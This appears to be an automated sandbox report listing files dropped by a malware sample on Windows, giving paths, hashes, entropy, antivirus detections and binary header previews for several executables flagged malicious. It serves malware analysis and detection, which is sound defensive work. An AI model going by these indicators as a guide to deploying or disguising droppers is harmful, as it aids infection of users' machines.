                                                                                                                      Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER20E5.tmp.txt
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):13340
                                                                                                                      Entropy (8bit):2.6954899185007766
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:9GiZYW+L4ZOtYzYIfRWLEH9UYEZJsJtMifFSySwmM7azdv30JiIU83:9jZD+fUlKscaazd/0JFU83
                                                                                                                      MD5:7C2AA9B20C71B8DD577514C4DDBBD712
                                                                                                                      SHA1:463B97C6A6F96546361BF21B6317E9293607FA2F
                                                                                                                      SHA-256:8C1BF6329AB684529639CC05DBF3B1780CF840DC68291086737CB14EAD142A10
                                                                                                                      SHA-512:1093A857D78BD1CEC600A6B6DBD50166CB7CEC200129E3A88F877AE91B1A92F148B5946E8FEE0FC3E9DC6D388CE9F5639DDCD4B58EEF98AFB9F61DCE93C37903
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER472.tmp.WERInternalMetadata.xml
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8390
                                                                                                                      Entropy (8bit):3.700501604073412
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:Rrl7r3GLNiLe696YIhSUFEgmfIRSHCpDg89bo2HlsfIYm:RrlsNiS696YeSUGgmfIRSao/f+
                                                                                                                      MD5:4B651050CA6DE05729DB037C8478C51F
                                                                                                                      SHA1:0BF9C319562E7CC3201B2DED04AAD2231E896310
                                                                                                                      SHA-256:AD3B556FE1FE1665E2FE34EC93BA192963A2E9CDA8BC79E0CA94B61A97D2B727
                                                                                                                      SHA-512:28A03C0F8399AA0F8A121B51EAAA0E5CCC6530AA3015959673B489CD3847CC89105A6E82D766C1C6F6379B60D71A4EBB5C8700D651B0BC162181E9447FEF147B
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.2.4.<./.P.i.d.>.......
                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB49.tmp.xml
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4685
                                                                                                                      Entropy (8bit):4.473771438286213
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:cvIwSD8zsLJgtWI9IOWSC8BJG8fm8M4JHl8qFBD4+q8vX8p5PnzmdU1d:uITfljvSNzDJH7EKu5PnCdU1d
                                                                                                                      MD5:CF08C1DE42859C20B2D34A25654CB927
                                                                                                                      SHA1:08723BDD9572112FF16270CC766085C89148915D
                                                                                                                      SHA-256:C480A9FF150CBDE8804F51B4264A3213697E2614F04CE506BB11A2C34BE377FB
                                                                                                                      SHA-512:5043BB5B3A08FFC31FFCACCF95D3641A88708C05C2AD3E5FC37B08E92CDBA171BA9EFBA39D8D78C3405FA8C15EC4B8471611663D5A27FE445418A923DC48A627
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342935" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA77.tmp.csv
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):51858
                                                                                                                      Entropy (8bit):3.0616433192144115
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:jLHv5WmtKiTdiIMZN+fNz0Ehs9WKTebyqbp:jLHv5WmtKiTdiIMZN+fx0Ehs9WKTebyG
                                                                                                                      MD5:74A2DA0D08295658AA1F0293F6EADF2E
                                                                                                                      SHA1:0C6C053599986E8D921BEEA9FE16EF324FB39CC4
                                                                                                                      SHA-256:00D32A923A24EDE8F79E33C2E661F32AD3D903EDBE6C4B2D24A9344840782DE7
                                                                                                                      SHA-512:24C2574F4AC293E82DCFA458C2C671BCE4D3CC2FC8AF56554C8A772CA83F89F9C4A16083CAA2A40D6A6C3AEAAAA90B8209158D9FC50F4ED93864869042B40D5F
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERBEED.tmp.txt
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):13340
                                                                                                                      Entropy (8bit):2.695534489993445
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:9GiZYWztLC0YZYHWlKbfHCUYEZlot0iXFjKVw5/4ZidaWXHBJrXIsJ3:9jZDVO7Y2JdaWXHBJr4sJ3
                                                                                                                      MD5:25F7F1558464C00B4E4D702D387DA442
                                                                                                                      SHA1:3240050B847D2BFCB21F9C7F866FA8488C98C37C
                                                                                                                      SHA-256:AAA81A7419C4ED2C6E75EC2BE1C2DEBF54550E1F8B97352416130C7ED4290C9D
                                                                                                                      SHA-512:F7F6CF719652058B24450EF387F149614AD950FDA2ADFD3418BDA3951B33A639461864E7E81292B87F327789101C2C25203D0D0C1F7A5499CE4303217AA2FA6C
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA10.tmp.dmp
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Sat Jan 15 05:05:13 2022, 0x1205a4 type
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):42152
                                                                                                                      Entropy (8bit):1.9990135190542404
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:TcGeH/iNOeh0wVM6/7wJ8EpwLkSjtUHpKxTHtE1W:WHeLsxyLFEsdu1W
                                                                                                                      MD5:51E48C78778D421A4C28C21DF4E8DEEF
                                                                                                                      SHA1:E1B678DFFCAEB6074ED6C741457D3B6FFD198BB8
                                                                                                                      SHA-256:F8B2510CC073E240F4FA3588B5D06DECB7C7FFEEDD9B09E3715D06A82EC5E098
                                                                                                                      SHA-512:1BB92EF8DDF4137C261C73562E177FF1F5FBA83AE7720846C000777C36FE9C88C1082897051CB95E8BDF88A340CBA92BCE925164705BA687BC87CC204F98EF95
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MDMP....... ........V.a....................................4...v(..........T.......8...........T...........................x...........d....................................................................U...........B..............GenuineIntelW...........T............U.a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3BC6.exe.log
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\3BC6.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):700
                                                                                                                      Entropy (8bit):5.346524082657112
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                      MD5:65CF801545098D915A06D8318D296A01
                                                                                                                      SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                      SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                      SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                      C:\Users\user\AppData\Local\Temp\2473.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):7336391
                                                                                                                      Entropy (8bit):7.993025428513385
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:196608:76+hvICteEroXxqENE+sKsXXgvkz+AlnhMCRKsAN2aL:DInEroXjsKkXgsCMhkrNF
                                                                                                                      MD5:CBE604877A46CEEBA112802BC17FFEF8
                                                                                                                      SHA1:E85AB4CCBE491348C39F751162FFF71A90643ECA
                                                                                                                      SHA-256:32703A3D88B3E9B8FE1A64FD1CBCC0925FC2C74BCBDEFBBD6944CBFAD0029FEC
                                                                                                                      SHA-512:86F3946B813FB457D95B6635FA308DA1BF5F2C0FBD5BDCA75F7776D1A01A2D3C67A8A9E268DCC145FF575D70FBE84BE9BEB112A0D2269B955795C74468C00598
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'X.8c9.kc9.kc9.kwR.jh9.kwR.jd9.kwR.j.9.k.V#kg9.k1L.jE9.k1L.jr9.k1L.jj9.kwR.jh9.kc9.k.9.k.L.jp9.k.L.jb9.kRichc9.k................PE..d...Q..a.........."......6...T................@......................................p...`..................................................[..x...............................H... 9..............................@9..8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data........p.......T..............@....pdata...............`..............@..@_RDATA...............~..............@..@.rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\254E.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):324096
                                                                                                                      Entropy (8bit):6.7085322399040335
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:7YHQmo4o6MLYuiQagdEmekrti+RUgf8pbdv:7oQLRPEQLFnrlRt8pJ
                                                                                                                      MD5:41AB3EFA04441E560A279BD0F7C0503D
                                                                                                                      SHA1:36498DB70D79BC77FD1D8C9543457BA467486D77
                                                                                                                      SHA-256:5CE3B77E18533D7FC98C430034D5F384D81289FD28E3E9FF7DB248EB508F8002
                                                                                                                      SHA-512:735CA627FFD1E4581854B3F8D1777AAD86A1BFBEE975C46F021EE1E2C19547EF84F498ADD85705B9B8BB24BCBE143AEDDEF31CBAB9D343D264AD2FF4C188832B
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L......`..........................................@.............................................................................P.......(........................................................... ...@...............L............................text............................... ..`.data...............................@....wuxut..............................@....tijayu.............................@....zemoyi.............................@....rsrc...(............"..............@..@.reloc..dF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\2F32.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):54272
                                                                                                                      Entropy (8bit):4.125149292696976
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:s7yxMfjf6NrLqKZ6mXS9LzL1pvULIRPqY2F3991ZuBhyY8PGCz9QwAOSZCGQyBbf:KyufjSLq86mXS9LzLdqY2LHZ4cZA
                                                                                                                      MD5:1B1E4286625BB189A526E910F2031C7B
                                                                                                                      SHA1:650C0550F12C65D9841D10AB589FF39261018957
                                                                                                                      SHA-256:C9D7CB68DEC80469C3C03B0E90C7AF1972462CA7779424DB3BFD9D44AEBAA624
                                                                                                                      SHA-512:68F2366606B658FDDB2B5E9BAE2E6931FB455A230F8A4813EACB38A3D7853B9640F46FE9EE6FFD9862A509558B66C30A3494CB7231C3EF7CD784950771273155
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....vL..........."...0..............5... ...@....@.. ....................... ............@..................................4..O....@..\............................4............................................... ............... ..H............text........ ...................... ..`.rsrc...\....@......................@..@.reloc..............................@..B.................4......H........#..`............3...............................................0..:........(.......(....(.....s......o.....(.......(....(.......+..*".(.....*..0............ ...(....r...p......%.."...(.....(...........%. N..."....o....&. ....(........&.....&...(....r...pr5..pr9..p(..........%..'...(.....(....s..........%.r;..p.o....t.....+..*........B..Q.......0..7.........(.............,.....i(.....(.....o....&s .....(....o!...o"....s#......o$.....+...(%.........o&...o'.......((..
                                                                                                                      C:\Users\user\AppData\Local\Temp\3136.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):321536
                                                                                                                      Entropy (8bit):6.690971316601855
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:7vrN0pZXR3Srrj51BawxgIKP184NSWd2hQAjh3C:zrN0vR36TBHLY1JSWMQAt
                                                                                                                      MD5:023802260A0216012A5F00079406D967
                                                                                                                      SHA1:AC1B2B166216DE3D15552BCD23BEC03536AFE1A7
                                                                                                                      SHA-256:0B2E2469C995A8D8DAF14CD69EF8717590B538C8A5B432F8704079DB5CF03D04
                                                                                                                      SHA-512:589294C84150CFAC2830D58BC7BCA665FF86574417792BF7C02905924058F745F4D55CB12F01FB5C894A1964D2EF1009031FA598D6288CE581F22B7D19B01283
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L.....}`..........................................@........................................................................4...P.......(........................................................... ...@...............L............................text............................... ..`.data...............................@....yocinoj............................@....lebe...............................@....wuno...............................@....rsrc...(...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\3A7E.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3576320
                                                                                                                      Entropy (8bit):7.9976863291960605
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
                                                                                                                      MD5:5800952B83AECEFC3AA06CCB5B29A4C2
                                                                                                                      SHA1:DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
                                                                                                                      SHA-256:B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
                                                                                                                      SHA-512:2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......!7.....................................|.N. .... M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........x+...P......................@.............1.........................@....rsrc........ M......L0.............@....28gybOo......N.......1.............@....adata.......pS.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\3BC6.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):537088
                                                                                                                      Entropy (8bit):5.840438491186833
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                                                                      MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                      SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                                                                                                      SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                                                                      SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: Metadefender, Detection: 46%, Browse
                                                                                                                      • Antivirus: ReversingLabs, Detection: 89%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                                                                                                      C:\Users\user\AppData\Local\Temp\45AA.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):905216
                                                                                                                      Entropy (8bit):7.399713113456654
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                      MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                      SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                      SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                      SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                      Malicious:true
